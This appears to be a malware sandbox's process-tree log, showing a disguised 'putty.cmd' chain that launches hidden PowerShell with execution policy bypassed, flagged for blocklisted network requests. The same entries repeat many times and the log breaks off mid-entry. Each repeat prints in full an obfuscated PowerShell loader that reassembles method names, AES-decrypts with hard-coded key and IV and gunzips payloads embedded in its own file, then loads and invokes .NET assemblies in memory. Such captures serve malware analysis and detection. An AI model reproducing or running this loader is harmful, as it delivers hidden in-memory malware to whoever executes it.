C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:2368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:4692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:2036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3588

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:3908

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:3988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:2784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:1276

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:4056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:5012

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:4876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:2940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:3488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2452

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:2928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:2920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:1984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2104

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:2804

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:4776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:432

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:3020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:1852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\putty.cmd';$rFXv='EnGBSCtryGBSCPGBSCoinGBSCtGBSC'.Replace('GBSC', ''),'CUIjOrUIjOeaUIjOteUIjODecUIjOrypUIjOtoUIjOrUIjO'.Replace('UIjO', ''),'CoQiCfpyQiCfToQiCf'.Replace('QiCf', ''),'ChaTJBbngeTJBbETJBbxTJBbtTJBbenTJBbsTJBbionTJBb'.Replace('TJBb', ''),'GUkIbetUkIbCuUkIbrUkIbrenUkIbtUkIbProUkIbcesUkIbsUkIb'.Replace('UkIb', ''),'InPAfavokPAfaePAfa'.Replace('PAfa', ''),'RBJyxeaBJyxdLBJyxiBJyxnBJyxesBJyx'.Replace('BJyx', ''),'DeSxuocoSxuompSxuorSxuoesSxuosSxuo'.Replace('Sxuo', ''),'ElebIuGmebIuGnbIuGtAbIuGtbIuG'.Replace('bIuG', ''),'LoahPUvdhPUv'.Replace('hPUv', ''),'MDxyiaDxyiiDxyinMDxyiodDxyiulDxyieDxyi'.Replace('Dxyi', ''),'FrtzKpomBtzKpatzKpsetzKp64tzKpSttzKprintzKpgtzKp'.Replace('tzKp', ''),'SpxkWylixkWytxkWy'.Replace('xkWy', ''),'TrqXeEanqXeEsqXeEforqXeEmFqXeEinqXeEalqXeEBlqXeEoqXeEckqXeE'.Replace('qXeE', '');powershell -w hidden;function HtjiD($WhcRa){$RxMuP=[System.Security.Cryptography.Aes]::Create();$RxMuP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RxMuP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RxMuP.Key=[System.Convert]::($rFXv[11])('6qfBajAjBLLLERsnjnVCaHssNnxliyfTegST0BRO04Q=');$RxMuP.IV=[System.Convert]::($rFXv[11])('/1orvBajL3CcAQUeEJe3RA==');$AKtbO=$RxMuP.($rFXv[1])();$wCZVX=$AKtbO.($rFXv[13])($WhcRa,0,$WhcRa.Length);$AKtbO.Dispose();$RxMuP.Dispose();$wCZVX;}function mcKuT($WhcRa){$sdKwh=New-Object System.IO.MemoryStream(,$WhcRa);$KcOxl=New-Object System.IO.MemoryStream;$DtaLI=New-Object System.IO.Compression.GZipStream($sdKwh,[IO.Compression.CompressionMode]::($rFXv[7]));$DtaLI.($rFXv[2])($KcOxl);$DtaLI.Dispose();$sdKwh.Dispose();$KcOxl.Dispose();$KcOxl.ToArray();}$HVnbx=[System.IO.File]::($rFXv[6])([Console]::Title);$kqnRx=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 5).Substring(2))));$YFqfz=mcKuT (HtjiD ([Convert]::($rFXv[11])([System.Linq.Enumerable]::($rFXv[8])($HVnbx, 6).Substring(2))));[System.Reflection.Assembly]::($rFXv[9])([byte[]]$YFqfz).($rFXv[0]).($rFXv[5])($null,$null);[System.Reflection.Assembly]::($rFXv[9])([byte[]]$kqnRx).($rFXv[0]).($rFXv[5])($null,$null); "
5⤵
PID:3568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\tempScript.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
PID:1088

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Users\Admin\putty.cmd
3⤵
PID:2044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\putty.cmd
4⤵
PID:1152

C:\Windows\system32\cmd.exe
